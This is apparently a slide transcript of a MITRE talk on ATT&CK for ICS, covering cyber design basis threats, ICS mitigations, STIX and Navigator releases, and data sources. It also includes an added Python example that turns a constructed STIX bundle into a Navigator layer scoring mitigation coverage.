  • 105. LEVERAGING CYBER DBTS: ASSESSING DETECTION COVERAGE (Navigator view of Scripting and its sub-techniques: PowerShell, AppleScript, Windows Command Shell, Unix Shell, Visual Basic, Python, JavaScript/JScript, shown against Trisis [S0013])
  • 106. HOW TO CREATE A CYBER DBT (SUMMARY) • DIGEST THREAT INTELLIGENCE • WorldView, CISA, vendors, etc. • UNDERSTAND YOUR SYSTEMS • Crown Jewel Analysis • EVALUATE YOUR DEFENSES • Quantify your mitigation and detection coverage • FOCUS ON THREAT BEHAVIORS • Combine and correlate this information with a common lexicon (ATT&CK)
  • 107. WHY SHOULD YOU USE CYBER DBTS? (SUMMARY) • ASSESS EFFECTIVENESS OF DEFENSES • EVALUATE THREAT DETECTION COVERAGE • DEVELOP AND TEST IR PLAYBOOKS • TRAIN PERSONNEL • IDENTIFY ‘BEYOND DESIGN’ SCENARIOS
  • 109. ©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 What’s New with ATT&CK® for ICS? Otis Alexander https://attack.mitre.org/ics @ojalexander
  • 112. ATT&CK for ICS Mitigations https://collaborate.mitre.org/attackics/index.php/Mitigations • M0800-M0816 are new to ATT&CK for ICS • Each mitigation has mappings to IEC 62443 and NIST SP 800-53 • Mitigations target the following stakeholders: • Asset owner/operators • Integrators • Device vendors • Security vendors • There is a significant focus on protecting operational and management interfaces of embedded controllers
  • 113. STIX and Navigator Integration • As part of ATT&CK v8, we released ATT&CK for ICS in STIX https://github.com/mitre/cti/tree/master/ics-attack • A new version of ATT&CK Navigator was released as well, where you can pick the ICS domain https://mitre-attack.github.io/attack-navigator/
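An added example (not MITRE's code) of consuming the two releases on this slide together: walking an ATT&CK-for-ICS STIX bundle to pair techniques with the mitigations that address them, then writing the result out as a Navigator layer for the ICS domain. The bundle here is a constructed, minimal stand-in for the ics-attack bundle in mitre/cti that uses the same object shapes (attack-pattern, course-of-action, "mitigates" relationships, ATT&CK IDs in external_references under source_name "mitre-ics-attack"); the IDs and names come from the DBT slides earlier on this page, while the kill-chain phases, the deprecated placeholder T0999 and the STIX UUIDs are made up. The layer fields (layer and Navigator version "4.0", domain "ics-attack") are my reading of the Navigator 4 layer format and should be checked against the Navigator repository before use.

```python
"""Read ATT&CK for ICS in STIX 2 form and emit a Navigator layer.

Added example, not MITRE's code. BUNDLE is a constructed stand-in for the
ics-attack bundle in mitre/cti; the kill_chain_name, layer version and
domain strings are assumptions to verify against the real releases."""
import json

KCN = "mitre-ics-attack"  # source_name / kill_chain_name used by the ICS bundle (assumption)


def ap(uuid, tid, name, phases, deprecated=False):
    obj = {"type": "attack-pattern", "id": f"attack-pattern--{uuid}", "name": name,
           "external_references": [{"source_name": KCN, "external_id": tid}],
           "kill_chain_phases": [{"kill_chain_name": KCN, "phase_name": p} for p in phases]}
    if deprecated:
        obj["x_mitre_deprecated"] = True
    return obj


def coa(uuid, mid, name):
    return {"type": "course-of-action", "id": f"course-of-action--{uuid}", "name": name,
            "external_references": [{"source_name": KCN, "external_id": mid}]}


def rel(uuid, source_ref, target_ref):
    return {"type": "relationship", "id": f"relationship--{uuid}",
            "relationship_type": "mitigates", "source_ref": source_ref, "target_ref": target_ref}


U = "00000000-0000-4000-8000-%012d"  # constructed UUIDs
BUNDLE = {"type": "bundle", "id": "bundle--" + U % 0, "objects": [
    ap(U % 1, "T0822", "External Remote Services", ["initial-access"]),
    ap(U % 2, "T0859", "Valid Accounts", ["persistence", "lateral-movement"]),
    ap(U % 3, "T0817", "Drive-by Compromise", ["initial-access"]),
    ap(U % 4, "T0999", "Placeholder (deprecated, not a real ICS technique)", ["execution"], deprecated=True),
    coa(U % 5, "M1032", "Multi-factor Authentication"),
    coa(U % 6, "M1021", "Restrict Web-Based Content"),
    rel(U % 7, "course-of-action--" + U % 5, "attack-pattern--" + U % 1),
    rel(U % 8, "course-of-action--" + U % 5, "attack-pattern--" + U % 2),
    rel(U % 9, "course-of-action--" + U % 6, "attack-pattern--" + U % 3),
    rel(U % 10, "course-of-action--" + U % 6, "attack-pattern--" + U % 4),
]}


def attack_id(obj, source=KCN):
    """ATT&CK ID (T0822, M1032, ...) from an object's external_references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == source:
            return ref["external_id"]
    return None


def active_techniques(bundle):
    """attack-pattern objects that are neither revoked nor deprecated."""
    return [o for o in bundle["objects"] if o["type"] == "attack-pattern"
            and not o.get("revoked") and not o.get("x_mitre_deprecated")]


def mitigations_by_technique(bundle):
    """Technique ID -> set of mitigation IDs, via 'mitigates' relationships."""
    by_id = {o["id"]: o for o in bundle["objects"]}
    out = {attack_id(t): set() for t in active_techniques(bundle)}
    for r in bundle["objects"]:
        if r["type"] != "relationship" or r.get("relationship_type") != "mitigates":
            continue
        src, tgt = by_id.get(r["source_ref"]), by_id.get(r["target_ref"])
        if src and tgt and src["type"] == "course-of-action" and attack_id(tgt) in out:
            out[attack_id(tgt)].add(attack_id(src))
    return out


def navigator_layer(bundle, name="Mitigation count per ICS technique"):
    """Score each technique cell by how many mitigations address it."""
    mits = mitigations_by_technique(bundle)
    techniques = [{"techniqueID": attack_id(t), "tactic": ph["phase_name"],
                   "score": len(mits[attack_id(t)]),
                   "comment": ", ".join(sorted(mits[attack_id(t)]))}
                  for t in active_techniques(bundle)
                  for ph in t.get("kill_chain_phases", [])]
    return {"name": name, "versions": {"attack": "8", "navigator": "4.0", "layer": "4.0"},
            "domain": "ics-attack", "techniques": techniques,
            "gradient": {"colors": ["#ffffff", "#66b032"], "minValue": 0, "maxValue": 2}}


def layer_json(bundle):
    return json.dumps(navigator_layer(bundle), indent=2)


if __name__ == "__main__":
    print(layer_json(BUNDLE))
```

Filtering revoked and deprecated techniques before building the layer matters with the real bundle, which keeps such objects for history; the deprecated placeholder here is dropped even though a mitigation still points at it.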
  • 114. What’s on the Horizon?
  • 115. Updates to Data Sources • Maintaining visibility into ICS networks is essential for quickly detecting and remediating cyber threats. • Understanding the various data sources that are available in ICS networks is key to this endeavor. Network traffic is a popular source of data in ICS networks but there are other valuable sources of data that are often overlooked. • Embedded device logs • Application logs • Operational databases
  • 116. Data Sources. Configuration: Firmware version; System settings; Control logic; Parameters. Performance and Statistics: CPU, memory, disk, ethernet, etc.; Network connection information. Process Information: I/O values associated with tags; Alarms and faults (e.g., digital fault recorder); Events (e.g., command execution); Process quality (e.g., phasor measurement unit). Asset Management: Condition-based monitoring; Predictive maintenance; Work order system. Physical: Physical sensors (e.g., tamper detection)
  • 117. ICS Attacks Mapped to Enterprise • We’re currently working on mapping the following ICS attacks: • Stuxnet • Ukraine 2015 • Industroyer • Triton • Adversaries do not respect theoretical boundaries (i.e., IT/ICS) so it is important to have a deep understanding of how IT platforms are leveraged to access and impact ICS.
  • 118. We Need Your Help! • How can we improve ATT&CK for ICS? • How are you currently using mitigations? • Do you have any opinions on our data source focus?
  • 119. attack@mitre.org @MITREattack Otis Alexander @ojalexander
  • 120. Join our next session on January 14 Register now! https://na.eventscloud.com/ATTACKcon-power-hour